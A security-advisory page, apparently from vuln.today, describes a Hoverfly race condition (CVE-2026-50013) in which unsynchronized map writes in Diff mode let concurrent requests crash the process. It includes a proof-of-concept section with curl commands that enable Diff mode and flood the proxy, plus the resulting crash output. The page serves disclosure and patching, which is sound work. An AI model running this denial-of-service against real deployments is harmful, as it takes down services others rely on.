Skip to main content

Hoverfly CVE-2026-50013

HIGH
Race Condition (CWE-362)
2026-07-14 https://github.com/SpectoLabs/hoverfly GHSA-qrh4-p6v4-mrfg
7.5
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.5 HIGH
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
vuln.today AI
7.5 HIGH

Reachable over the network proxy port with low complexity and no auth or interaction; impact is a full process crash (A:H) with no confidentiality or integrity effect, though it requires the non-default Diff mode.

3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
4.0 AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
Jul 14, 2026 - 19:53 vuln.today
Analysis Generated
Jul 14, 2026 - 19:53 vuln.today
CVE Published
Jul 14, 2026 - 18:03 github-advisory
HIGH 7.5

DescriptionGitHub Advisory

Summary:

When Hoverfly is running in Diff mode, the AddDiff() function writes to the shared responsesDiff map without any synchronization (no mutex). When multiple proxy requests are processed concurrently (the normal case for any proxy), the concurrent map writes trigger Go's built-in race detector which causes a fatal error: concurrent map read and map write, immediately killing the entire Hoverfly process. This is trivially exploitable by sending multiple simultaneous requests.

Details:

1. Unsynchronized map access in AddDiff() (core/hoverfly_service.go:417-421):

go
func (hf *Hoverfly) AddDiff(requestView v2.SimpleRequestDefinitionView, diffReport v2.DiffReport) {
    if len(diffReport.DiffEntries) > 0 {
        diffs := hf.responsesDiff[requestView]                    // UNSYNCHRONIZED READ
        hf.responsesDiff[requestView] = append(diffs, diffReport) // UNSYNCHRONIZED WRITE
    }
}

2. This function is called from Diff mode processing, which runs concurrently per request (core/modes/diff_mode.go):

Each incoming proxy request is handled in its own goroutine by Go's net/http server. In Diff mode, each request calls AddDiff() after comparing the simulated and actual responses. With multiple concurrent requests, multiple goroutines write to the same map simultaneously.

3. Go's runtime detects concurrent map access and terminates the process:

Unlike data races on simple values (which produce undefined behavior silently), Go's map implementation includes a built-in concurrent access check. When two goroutines access the same map and at least one is writing, the runtime calls fatal() which is unrecoverable, it cannot be caught by recover().

4. No mutex protection exists on responsesDiff:

The field is declared as a plain map[v2.SimpleRequestDefinitionView][]v2.DiffReport with no associated sync.RWMutex. Compare with hf.state which properly uses sync.RWMutex for its map access.

Environment:

  • Hoverfly version: v1.12.7
  • Operating System: macOS Darwin 25.4.0
  • Go version: 1.26.2
  • Configuration: Hoverfly in Diff mode (PUT /api/v2/hoverfly/mode {"mode":"diff"})

POC:

Step 1: Start Hoverfly and set Diff mode

bash
./hoverfly &
sleep 2
# Set diff mode
curl -X PUT http://localhost:8888/api/v2/hoverfly/mode \
  -H "Content-Type: application/json" \
  -d '{"mode": "diff"}'
# Load a simulation for diff comparison
curl -X PUT http://localhost:8888/api/v2/simulation \
  -H "Content-Type: application/json" \
  -d '{
    "data": {
      "pairs": [{
        "request": {"path": [{"matcher": "glob", "value": "*"}]},
        "response": {"status": 200, "body": "expected"}
      }],
      "globalActions": {"delays": [], "delaysLogNormal": []}
    },
    "meta": {"schemaVersion": "v5.2"}
  }'

Step 2: Send concurrent requests to trigger the race

bash
# Send 50 concurrent requests, race condition triggers within seconds
for i in $(seq 1 50); do
    curl -s -x http://localhost:8500 "http://httpbin.org/get?id=$i" &
done
wait

Step 3: Observe the crash

bash
# Check if process is still running
pgrep -f hoverfly

crash output on Hoverfly v1.12.7:

fatal error: concurrent map read and map write

goroutine 892 [running]:
github.com/SpectoLabs/hoverfly/core.(*Hoverfly).AddDiff(...)
        /core/hoverfly_service.go:419
github.com/SpectoLabs/hoverfly/core/modes.(*DiffMode).Process(...)

The process crashes with ~50 concurrent requests. In production with real traffic, it crashes almost immediately.

Impact:

  • Full denial of service: The process terminates immediately and cannot be recovered without a restart
  • Trivial exploitation: Any attacker with proxy access can trigger this by sending multiple concurrent requests
  • No admin API access required: Only proxy port access is needed to trigger the crash
  • Unrecoverable: fatal error in Go cannot be caught by recover() - the process is unconditionally killed
  • Affects all Diff mode users: Any team using Diff mode for API comparison testing is vulnerable

AnalysisAI

Denial of service in Hoverfly's Diff mode (versions ≤ 1.12.7) lets any client with proxy access crash the entire process by sending concurrent requests. The AddDiff() function writes to the shared responsesDiff map without a mutex, so simultaneous proxy requests - the normal case for a proxy - trigger Go's built-in concurrent-map detector, producing an unrecoverable fatal error: concurrent map read and map write that kills the process. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Reach Hoverfly proxy port (Diff mode enabled)
Delivery
Send many simultaneous proxied requests
Exploit
Concurrent goroutines call AddDiff()
Execution
Unsynchronized writes to responsesDiff map
Persist
Go runtime fatal() concurrent map access
Impact
Process crashes, denial of service

Vulnerability AssessmentAI

Exploitation Hoverfly must be running in Diff mode - set explicitly via `PUT /api/v2/hoverfly/mode {"mode":"diff"}` - and a simulation must be loaded so responses actually generate diff entries (only non-empty `diffReport.DiffEntries` reach the unsynchronized append). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment This is a genuine, easy-to-trigger availability issue, not a paper high-CVSS. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker (or even ordinary load) with access to the Hoverfly proxy port on a Diff-mode instance sends a burst of simultaneous requests that produce diff entries; multiple goroutines then write to the unsynchronized `responsesDiff` map at once, Go's runtime detects the concurrent map access and calls the unrecoverable `fatal()`, and the whole Hoverfly process dies and stays down until manually restarted. A working POC exists in the vendor advisory and reliably crashes v1.12.7 with roughly 50 concurrent requests; the network vector and low attack complexity (AV:N/AC:L) mean no special tooling is required.
Remediation Vendor-released patch: upgrade to Hoverfly v1.12.8 (release https://github.com/SpectoLabs/hoverfly/releases/tag/v1.12.8), which adds a dedicated `responsesDiffMu sync.RWMutex` guarding all reads, writes, and range iterations over `responsesDiff` (fix PR https://github.com/SpectoLabs/hoverfly/pull/1227). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours, identify all Hoverfly instances running version 1.12.7 or earlier, particularly those with Diff mode enabled. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-50013 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy